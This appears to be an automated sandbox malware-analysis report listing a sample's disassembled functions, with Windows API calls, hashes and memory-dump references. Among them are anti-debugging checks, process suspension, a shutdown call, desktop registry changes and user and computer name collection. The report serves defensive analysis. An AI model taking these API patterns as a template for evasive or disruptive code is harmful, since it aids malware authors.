Opcode Fuzzy Hash: c87b7f836c0975e4eb5e884f55165a51c14a00d43e4e68f0cc0c416382850236
Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98

Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58

Function 02485B1C Relevance: 4.6, APIs: 3, Instructions: 98libraryloadershutdownCOMMON

Download Yara Rule

APIs

ExitWindowsEx.USER32(00000000,00000001), ref: 02485BC2
LoadLibraryA.KERNEL32(0046B9C0,0046B9B0), ref: 02485BD7
GetProcAddress.KERNEL32(00000000), ref: 02485BDE

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressExitLibraryLoadProcWindows
String ID:
API String ID: 1366546845-0
Opcode ID: 0a607b4a7b5ecc12f789a4cc2078a46f2f116dcd92e244ce5a1d878263211a66
Instruction ID: 5526b03612dc4d78b4879a18215cc8516cb396b3fb3d0878ae0eac9c6ee38264
Opcode Fuzzy Hash: 0a607b4a7b5ecc12f789a4cc2078a46f2f116dcd92e244ce5a1d878263211a66
Instruction Fuzzy Hash: DD2198B46043415BCB14FBB18858AFF239BAF50740F41482FE91B9B580EF64D94ACB66

Function 0043A65D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A75F
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A76C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f6877d8d1adc226b5a5a61549576e3a1378d21ddff0cd48c7153210e66105240
Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
Opcode Fuzzy Hash: f6877d8d1adc226b5a5a61549576e3a1378d21ddff0cd48c7153210e66105240
Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49

Function 024AA8C4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 024AA9BC
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 024AA9C6
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 024AA9D3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
Instruction ID: 6869a301701bb98ccccc08f2c4cf27c6eb63a739fdcf15e051b61ae68ea4f886
Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
Instruction Fuzzy Hash: B131C4759012289BCB21DF65D8887DDBBB8BF18310F5046EAE80CA7250E7709F81CF44

Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C

Function 024A2BA1 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00471B2C,00000000,024A282C,00000034,00471B2C,?,?), ref: 024A2BB3
CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,024A28BE,00000000,?,00000000), ref: 024A2BC9
CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,024A28BE,00000000,?,00000000,0248D9C7), ref: 024A2BDB

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction ID: 7fdea0616f02f384802cdbfae70c6afcc0557ff46e96b9ea3dffdf16b2fd09d1
Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction Fuzzy Hash: AEE0923130D310BBEB314F25BC18F673A94DB95B71F64063AF651E40E4C2A18441A518

Function 00442554 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
ExitProcess.KERNEL32 ref: 0044258E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88

Function 024B27BB Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,024B2791,00000000,0046DAE0,0000000C,024B28E8,00000000,00000002,00000000), ref: 024B27DC
TerminateProcess.KERNEL32(00000000,?,024B2791,00000000,0046DAE0,0000000C,024B28E8,00000000,00000002,00000000), ref: 024B27E3
ExitProcess.KERNEL32 ref: 024B27F5

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction ID: ba6cf703a26cec4ae0a57696a5d9b21f3593cb68016c605db970ec6afa099ccf
Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
Instruction Fuzzy Hash: 7CE0B636004608EFCF52AF55ED08A897B6EEF40346F004575FC098A632CB75E982DEA8

Function 0041ACC1 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenSuspend
String ID:
API String ID: 1999457699-0
Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4

Function 0041ACED Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
NtResumeProcess.NTDLL(00000000), ref: 0041AD05
CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenResume
String ID:
API String ID: 3614150671-0
Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4

Function 0248AF54 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0248534F,00000000), ref: 0248AF5F
NtResumeProcess.NTDLL(00000000), ref: 0248AF6C
CloseHandle.KERNEL32(00000000,?,?,0248534F,00000000), ref: 0248AF75

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenResume
String ID:
API String ID: 3614150671-0
Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
Instruction ID: 86e7a4fcf722b7a99ff8a170ec55f36efd2a9fab429b66fc86afb4ac70f4f33e
Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
Instruction Fuzzy Hash: 9CD09E33518131678221176A7C0D99BEDA9DBC69B37064276F505D26619A60D84186A4

Function 0248AF28 Relevance: 4.5, APIs: 3, Instructions: 19nativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0248532A,00000000), ref: 0248AF33
NtSuspendProcess.NTDLL(00000000), ref: 0248AF40
CloseHandle.KERNEL32(00000000,?,?,0248532A,00000000), ref: 0248AF49

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleOpenSuspend
String ID:
API String ID: 1999457699-0
Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
Instruction ID: cbffd4aded5e6b0120bbd34b50fa7c7c560c2ad072008bc4655f7f864f727722
Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
Instruction Fuzzy Hash: 49D0A733509131638220276A7C0CC8BEE6CDFC1DB37024176F509C3220DA70C84186F4

Function 0247092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

GetProcAddress., xrefs: 024709DC, 024709DF, 024709E4
., xrefs: 0247095F
l, xrefs: 02470966

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4

Function 0044D5E9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0044D77C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: eb953f94b8b53f1317ab0c7b59edf6feb0fe8e1e95f8eebbf5c5021a559e3516
Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
Opcode Fuzzy Hash: eb953f94b8b53f1317ab0c7b59edf6feb0fe8e1e95f8eebbf5c5021a559e3516
Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64

Function 024BD850 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 024BD9E3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
Instruction ID: accc77afc4fdeab4a2ec14f6748b783fe79b8c54602b8a307118edaf0f184b0e
Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
Instruction Fuzzy Hash: 59310772C00209AFCF259E79CC84EEB7BBEDF86314F0401EEE81997251E6309A44CB60

Function 0248BDDE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0248BED3

Part of subcall function 02482939: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 02482948
Part of subcall function 02482939: RegSetValueExA.ADVAPI32(004655B0,0046BE08,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0248BEAD,0046BE08,004655B0,00000001,00473EE8,00000000), ref: 02482970
Part of subcall function 02482939: RegCloseKey.ADVAPI32(004655B0,?,?,0248BEAD,0046BE08,004655B0,00000001,00473EE8,00000000,?,02477C44,00000001), ref: 0248297B

Strings

Control Panel\Desktop, xrefs: 0248BE19, 0248BE4C, 0248BE9C

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop
API String ID: 4127273184-27424756
Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
Instruction ID: 94d365446b4279b267e3a6c83432871ff19d21239f009d563674e38c2d34a48f
Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
Instruction Fuzzy Hash: E8117233B906403AD519303A4D1BBBF2807D356B54F90011FEB12AA7DAEAC7469547DB

Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4

Strings

<D, xrefs: 00450D47

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: <D
API String ID: 1084509184-3866323178
Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744

Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29

Strings

<D, xrefs: 00450DE2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: <D
API String ID: 1084509184-3866323178
Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644

Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA

Strings

GetLocaleInfoEx, xrefs: 004475A8, 004475B2

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E

Function 00440E20 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84

Function 024B1087 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
Instruction ID: f66e2e1124e788e948fbcd6d1e237cfd57f107dfa25fb59e6e14f997fde527f1
Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
Instruction Fuzzy Hash: B1022B71E002199BDF15CFA9C9907EEBBB5EF88314F15826AD91DEB340D731A941CB90

Function 0041A7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Name$ComputerUser
String ID:
API String ID: 4229901323-0
Opcode ID: 76b1ccb755f165773fe0876831f1d8b05b3ce4830bffab4f48a215844774fed7
Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
Opcode Fuzzy Hash: 76b1ccb755f165773fe0876831f1d8b05b3ce4830bffab4f48a215844774fed7
Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

Function 004520D2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
